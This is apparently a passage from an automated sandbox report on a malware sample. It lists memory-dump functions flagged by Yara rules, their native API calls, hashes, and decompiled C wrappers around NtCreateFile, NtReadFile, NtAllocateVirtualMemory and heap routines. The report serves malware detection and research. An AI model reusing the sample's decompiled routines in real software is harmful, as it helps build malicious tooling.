                                                                            • Instruction ID: 2f757d61af378a123817b74c663fa689d5c26f4a8ce399f9004c72f95e490d44
                                                                            • Opcode Fuzzy Hash: c08a8e6d134c8fbb7e10b0408200612589c7842e0deb7065763ff3f192f8c184
                                                                            • Instruction Fuzzy Hash: E9016DB2200108BBDB18DF98CC95EEB77A9EF8C354F058649FE0CA7241C630E900CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                            • Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
                                                                            • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                            • Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 79%
                                                                            			E004185CA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				asm("adc al, 0xc7");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                            0x004185ca
                                                                            0x004185d3
                                                                            0x004185df
                                                                            0x004185e7
                                                                            0x0041861d
                                                                            0x00418621

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 390caab744daf5e02e8ba3b1f3c31110a532ab74553782deafef2ef63e94ca90
                                                                            • Instruction ID: fbc9bb5dded0252d1e6f7dc337aa802358ba39cf4a24b61eceedd20d47d24c39
                                                                            • Opcode Fuzzy Hash: 390caab744daf5e02e8ba3b1f3c31110a532ab74553782deafef2ef63e94ca90
                                                                            • Instruction Fuzzy Hash: 6E01AFB2215108ABCB08CF88DC95EEB77E9AF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                            0x004185df
                                                                            0x004185e7
                                                                            0x0041861d
                                                                            0x00418621

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 79%
                                                                            			E004187AA(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t14;

				asm("std");
				_t10 = _a8;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191D0(_a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t14;
			}




                                                                            0x004187aa
                                                                            0x004187b3
                                                                            0x004187bf
                                                                            0x004187c7
                                                                            0x004187e9
                                                                            0x004187ed

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 2e704c497ad9346261968df925699caa001921f9fc81b7c1df521c2d2dbb3965
                                                                            • Instruction ID: a84316d7603cd4b96a0b70d1cb6443dc91b73f185ddf853c5aae569aaccc0fe2
                                                                            • Opcode Fuzzy Hash: 2e704c497ad9346261968df925699caa001921f9fc81b7c1df521c2d2dbb3965
                                                                            • Instruction Fuzzy Hash: 30F0F8B6200109ABDB14DF99DC94EE777A9BF98254F158249FA0897241C631E911CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                            0x004187bf
                                                                            0x004187c7
                                                                            0x004187e9
                                                                            0x004187ed

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004186FA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 82%
                                                                            			E004186FA(void* __ebx, intOrPtr _a8, void* _a12) {
				long _t8;

				_pop(_t18);
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191D0(_a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}




                                                                            0x004186fb
                                                                            0x00418703
                                                                            0x00418706
                                                                            0x0041870f
                                                                            0x00418717
                                                                            0x00418725
                                                                            0x00418729

                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: eeebd00c5717df60cf00ec7130de4518e86694591e7402de10c3e16ed19930b8
                                                                            • Instruction ID: f91f12f76969bfede9cd18d8bab70bad15cd4c5d11c27978160d85291436c030
                                                                            • Opcode Fuzzy Hash: eeebd00c5717df60cf00ec7130de4518e86694591e7402de10c3e16ed19930b8
                                                                            • Instruction Fuzzy Hash: 94E0C2362002047BD714EFD8CC89EDB77A8EF447A0F154599BA095B242D230EA40C7D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191D0(_a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                            0x00418703
                                                                            0x00418706
                                                                            0x0041870f
                                                                            0x00418717
                                                                            0x00418725
                                                                            0x00418729

                                                                            APIs
                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 10a7630be49793a51c318046d304632aa6c4e292ac9677874f9e47114b896cc5
                                                                            • Instruction ID: 01749763257491064d1ccedc11d83f2f38f2441804349d263c645a42a3d252c5
                                                                            • Opcode Fuzzy Hash: 10a7630be49793a51c318046d304632aa6c4e292ac9677874f9e47114b896cc5
                                                                            • Instruction Fuzzy Hash: 589002B120100902D2407299844474A0105A7D0741F51C025A5454594EC6998DD57BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 853008e96714716008eafd015a6db2b29b2a5fd08fa64692e8d36459cbafd25d
                                                                            • Instruction ID: a0139bfa2ade770cbc0f30d0ea3967e82e77683b719cada1d1fcba6e510ad667
                                                                            • Opcode Fuzzy Hash: 853008e96714716008eafd015a6db2b29b2a5fd08fa64692e8d36459cbafd25d
                                                                            • Instruction Fuzzy Hash: 7B9002B134100942D20062998454B0A0105E7E1741F51C029E1454594DC659CC5276A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3d7b47bfd6f38269f566886e9a162ef28a65974bcbeea97eb3589578205165ec
                                                                            • Instruction ID: 8acf6679264530ef7ecdcbda08f3564cd1fda9f0bd74576c1fbd1fb4db6a5215
                                                                            • Opcode Fuzzy Hash: 3d7b47bfd6f38269f566886e9a162ef28a65974bcbeea97eb3589578205165ec
                                                                            • Instruction Fuzzy Hash: 56900271242046525645B299844450B4106B7E0681791C026A1804990CC5669856EBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4c879d98b7a9063503a38def3e0cc0dab1b5a10138e8529a1beb8afb68eee3e3
                                                                            • Instruction ID: bb5cb69ae16022cf1d80f8316ecef624c5f9b24bcf2a2c34ddf66229cef7d20f
                                                                            • Opcode Fuzzy Hash: 4c879d98b7a9063503a38def3e0cc0dab1b5a10138e8529a1beb8afb68eee3e3
                                                                            • Instruction Fuzzy Hash: CC90027120100913D2116299854470B0109A7D0681F91C426A0814598DD6968952B6A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 66cce0f4411ff63141a57f172941b956611cc1cac4f48754764a4a8b7332776f
                                                                            • Instruction ID: 0ab333789e0f32263ff21833224596b5f7c988e4330deefb5869e4741e844ff4
                                                                            • Opcode Fuzzy Hash: 66cce0f4411ff63141a57f172941b956611cc1cac4f48754764a4a8b7332776f
                                                                            • Instruction Fuzzy Hash: C490027160100A02D2017299844461A010AA7D0681F91C036A1414595ECA658992B6B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8b11254082d2f7171ea24e25528cf85b1e82ac1ec7f0b8fad27595b8bf6e0ba8
                                                                            • Instruction ID: 58283a773055c8b11f0245c99055186e1886db07c1aa2279efd6a9a775a6aed7
                                                                            • Opcode Fuzzy Hash: 8b11254082d2f7171ea24e25528cf85b1e82ac1ec7f0b8fad27595b8bf6e0ba8
                                                                            • Instruction Fuzzy Hash: 6390027120140902D2006299885470F0105A7D0742F51C025A1554595DC66588517AF1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 781ed1ce80d17cfd5791a78dd8f5d23f90bba14251747e874734cd8e069a287c
                                                                            • Instruction ID: 86ea89cb9563fe676b54dad144c5a88c9fd07b314a75c28baa1852a7052280d6
                                                                            • Opcode Fuzzy Hash: 781ed1ce80d17cfd5791a78dd8f5d23f90bba14251747e874734cd8e069a287c
                                                                            • Instruction Fuzzy Hash: CB90027160100542424072A9C88490A4105BBE1651751C135A0D88590DC59988656BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3ccea16eb9248a5c1c883330dd2185a63f6a4ed1d5ab9253100b5bed238a9b7b
                                                                            • Instruction ID: a98e482e59c9d48d5776b94b7d35764932c8003b825f5d011e2befbeb57d2b89
                                                                            • Opcode Fuzzy Hash: 3ccea16eb9248a5c1c883330dd2185a63f6a4ed1d5ab9253100b5bed238a9b7b
                                                                            • Instruction Fuzzy Hash: 3F90027121180542D30066A98C54B0B0105A7D0743F51C129A0544594CC95588616AA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1191a6605b43beba09210db359641142a26acb537feacaa3f7b4dba144a968b7
                                                                            • Instruction ID: 70b2202530335d2914ab84f4fb38c1c09a5cdc3b8c46df0578f302b0b1425fae
                                                                            • Opcode Fuzzy Hash: 1191a6605b43beba09210db359641142a26acb537feacaa3f7b4dba144a968b7
                                                                            • Instruction Fuzzy Hash: 23900275211005030205A699474450B0146A7D5791351C035F1405590CD661886166A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d99b0ddc88cc195b6060a36d3527d49cd3785a900fc679a03d02f048869d0c31
                                                                            • Instruction ID: 9c8db0b328e75360a7fe6d7b18056a289708f1d82300209dc61c67c768338567
                                                                            • Opcode Fuzzy Hash: d99b0ddc88cc195b6060a36d3527d49cd3785a900fc679a03d02f048869d0c31
                                                                            • Instruction Fuzzy Hash: 409002B12020050342057299845461A410AA7E0641B51C035E14045D0DC565889176A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5ab47ceba701452979e1553b1874753d74861fbc22cba2f79833117cd501359c
                                                                            • Instruction ID: 5e5333662b22df15793acecf6381390bd5ec866c4d6283beecac2649f26c113f
                                                                            • Opcode Fuzzy Hash: 5ab47ceba701452979e1553b1874753d74861fbc22cba2f79833117cd501359c
                                                                            • Instruction Fuzzy Hash: 5790027120100902D20066D9944864A0105A7E0741F51D025A5414595EC6A5889176B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4d25ca6ae4889dce26d3b0afd7add4274be323034570dc02efe9999fca6a12bd
                                                                            • Instruction ID: 2ada95daeb45712baae78adbbd2cc4e101e6c370c15b2084963390a66e3fe133
                                                                            • Opcode Fuzzy Hash: 4d25ca6ae4889dce26d3b0afd7add4274be323034570dc02efe9999fca6a12bd
                                                                            • Instruction Fuzzy Hash: AF90027921300502D2807299944860E0105A7D1642F91D429A0405598CC955886967A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 23c3e8def8badfd2fba1389a22f57c37028285254045773a4902a225670acfe3
                                                                            • Instruction ID: c954002aa9b1483d089318ef291aa43d8d106d068f3647e350715cd0da1d599f
                                                                            • Opcode Fuzzy Hash: 23c3e8def8badfd2fba1389a22f57c37028285254045773a4902a225670acfe3
                                                                            • Instruction Fuzzy Hash: A690027130100503D2407299945860A4105F7E1741F51D025E0804594CD955885667A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3a74db76d8d18a4ce71c8c26f73bb17069a1fc66b82fc630409a0e242d3fe654
                                                                            • Instruction ID: 375cbcf342647671a945613ca3714b27eec656e22288da9f88c17b1ba19d9bc6
                                                                            • Opcode Fuzzy Hash: 3a74db76d8d18a4ce71c8c26f73bb17069a1fc66b82fc630409a0e242d3fe654
                                                                            • Instruction Fuzzy Hash: 7E90027131114902D2106299C44470A0105A7D1641F51C425A0C14598DC6D5889176A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7849122b9b415eb1aac399d825a935c61beddc7413b46dd56534f665bc43a663
                                                                            • Instruction ID: d12be6528896aaa14987a32c7604b7f365e9c85e099e39024f51dc7ede97cc4d
                                                                            • Opcode Fuzzy Hash: 7849122b9b415eb1aac399d825a935c61beddc7413b46dd56534f665bc43a663
                                                                            • Instruction Fuzzy Hash: 9E90027120100D02D2807299844464E0105A7D1741F91C029A0415694DCA558A597BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: af5560d44078e0e6853a4b97153b71bb333cf9a9d9a876fdf1b72a15798fcbb9
                                                                            • Instruction ID: ee58d6cf023dd0e5782a87d2698c21aca8b1c1d723a52a11e737e77442659240
                                                                            • Opcode Fuzzy Hash: af5560d44078e0e6853a4b97153b71bb333cf9a9d9a876fdf1b72a15798fcbb9
                                                                            • Instruction Fuzzy Hash: 0F90027120108D02D2106299C44474E0105A7D0741F55C425A4814698DC6D5889176A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                                            • Instruction ID: fecb9998d56daf9cfaa78a55d0f1ea928f7019af28acdd4276aec55bf8742b64
                                                                            • Opcode Fuzzy Hash: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                                            • Instruction Fuzzy Hash: 4C212BB2D4020857CB10E6649E42BFF736C9B50304F04017FE989A2181F639AB498BA7
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004188D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 76%
                                                                            			E004188D2(intOrPtr __eax, intOrPtr* __ebx, void* __ecx, void* _a4, long _a8, void* _a12, long _a16, long _a20) {
				char _v0;
				void* __esi;
				void* __ebp;
				void* _t12;

				_push(cs);
				asm("cmpsd");
				asm("lodsd");
				 *0x75677a62 = __eax;
				if( *__ebx >= __ecx) {
					asm("adc al, 0x9");
					 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
					_t3 =  &_a12; // 0x413546
					_t12 = RtlAllocateHeap( *_t3, _a16, _a20); // executed
					return _t12;
				} else {
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0x10));
					_t6 = __eax + 0xc74; // 0xc74
					__esi = _t6;
					__eax = _a8;
					__ecx = _a4;
					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                                            0x004188d2
                                                                            0x004188d3
                                                                            0x004188d6
                                                                            0x004188d9
                                                                            0x004188de
                                                                            0x004188b8
